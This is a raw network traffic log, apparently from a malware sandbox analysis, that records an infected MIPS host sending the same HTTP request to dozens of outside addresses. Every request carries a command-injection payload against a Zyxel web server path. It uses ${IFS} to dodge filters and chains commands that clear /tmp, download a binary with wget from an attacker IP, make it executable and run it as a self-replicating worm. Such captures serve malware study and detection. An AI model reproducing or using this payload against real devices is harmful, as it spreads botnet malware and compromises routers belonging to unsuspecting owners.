                                          Jan 14, 2024 15:46:21.095731020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5394192.168.2.2351428164.95.76.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095758915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5395192.168.2.234788284.196.166.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095797062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5396192.168.2.234827071.129.254.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095817089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5397192.168.2.2360518171.175.212.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095840931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5398192.168.2.2353684124.67.151.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095869064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5399192.168.2.2358672191.148.204.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095870018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5400192.168.2.2333530146.118.248.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095921040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5401192.168.2.234809027.89.189.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095947027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5402192.168.2.234570073.50.17.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095974922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5403192.168.2.2343820112.233.236.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.095998049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5404192.168.2.2353456196.185.37.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096010923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5405192.168.2.235197664.191.225.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096035004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5406192.168.2.233906018.246.229.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096036911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5407192.168.2.23506261.90.101.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096096992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5408192.168.2.234620657.35.210.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096122026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5409192.168.2.2349122134.253.248.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096134901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5410192.168.2.2340966199.37.129.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096170902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5411192.168.2.235231620.149.5.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096224070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5412192.168.2.2351894110.47.254.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096299887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5413192.168.2.234680889.121.70.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096317053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5414192.168.2.2353486134.241.58.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096362114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5415192.168.2.2336468173.240.203.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096371889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5416192.168.2.2343908186.170.176.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096398115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5417192.168.2.234267691.244.169.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096421003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5418192.168.2.2341144178.150.39.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096447945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5419192.168.2.2341996129.157.42.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096450090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5420192.168.2.2351970147.136.28.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096488953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5421192.168.2.2356954170.68.80.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096522093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5422192.168.2.2360362203.218.153.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096549034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5423192.168.2.234961848.12.123.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096563101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5424192.168.2.233808613.160.75.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096585035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5425192.168.2.234455617.138.189.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096621990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5426192.168.2.235288079.194.243.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096664906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5427192.168.2.235966491.105.229.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096667051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5428192.168.2.235304097.159.72.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096718073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5429192.168.2.2358352152.244.102.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096745968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5430192.168.2.2342790183.81.86.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096805096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5431192.168.2.2346220213.27.30.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096817970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5432192.168.2.233345887.58.45.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096832991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5433192.168.2.233895252.236.100.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096857071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5434192.168.2.2339502131.201.254.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096893072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5435192.168.2.2346878194.79.43.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096923113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5436192.168.2.23525485.114.6.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096950054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5437192.168.2.235844443.75.4.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.096992970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5438192.168.2.234297662.223.173.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097013950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5439192.168.2.235530045.187.102.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097038031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5440192.168.2.234681892.152.236.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097069025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5441192.168.2.234616467.166.128.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097098112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5442192.168.2.2355660180.234.240.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097124100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5443192.168.2.2347566114.252.193.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097147942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5444192.168.2.235193623.225.70.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097163916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5445192.168.2.23334229.218.30.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097182989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5446192.168.2.2353072104.175.253.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097210884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5447192.168.2.235245213.195.138.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097220898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5448192.168.2.2351562167.53.127.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097269058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5449192.168.2.2342682101.39.120.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097321033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5450192.168.2.2357202183.177.145.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097330093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5451192.168.2.2353158187.205.121.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097356081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5452192.168.2.2359300115.166.108.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097397089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5453192.168.2.23398809.211.179.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097429991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5454192.168.2.2346428153.9.144.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097465992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5455192.168.2.2355636194.29.39.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097501040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5456192.168.2.2360596163.103.56.151443
                                          TimestampBytes transferredDirectionData
